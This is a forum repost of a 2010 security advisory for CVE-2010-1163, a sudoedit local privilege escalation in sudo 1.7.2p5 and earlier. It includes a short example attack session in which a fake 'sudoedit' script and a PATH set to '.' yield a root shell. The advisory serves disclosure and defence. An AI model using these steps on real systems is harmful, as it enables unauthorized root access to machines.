Jump to content
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

herakty

Exploit Linux sudoedit local privilege escalation through PATH manipulation

Recommended Posts

herakty
Security Advisory @ Mediaservice.net Srl

(#02, 19/04/2010) Data Security Division

        Title: sudoedit local privilege escalation through PATH manipulation

  Application: sudo <= 1.7.2p5

      Platform: Linux, maybe others

  Description: A local user with permission to run the sudoedit pseudo-command

can gain root privileges, through manipulation of the PATH

environment variable.

      Authors: Valerio Costamagna <sid@mediaservice.net>

                Maurizio Agazzini <inode@mediaservice.net>

Vendor Status: sudo team notified on 26/03/2010

CVE Candidate: The Common Vulnerabilities and Exposures project has assigned

the name CVE-2010-1163 to this issue.

    References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163

http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100419/94d5872c/attachment.txt

teckV

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.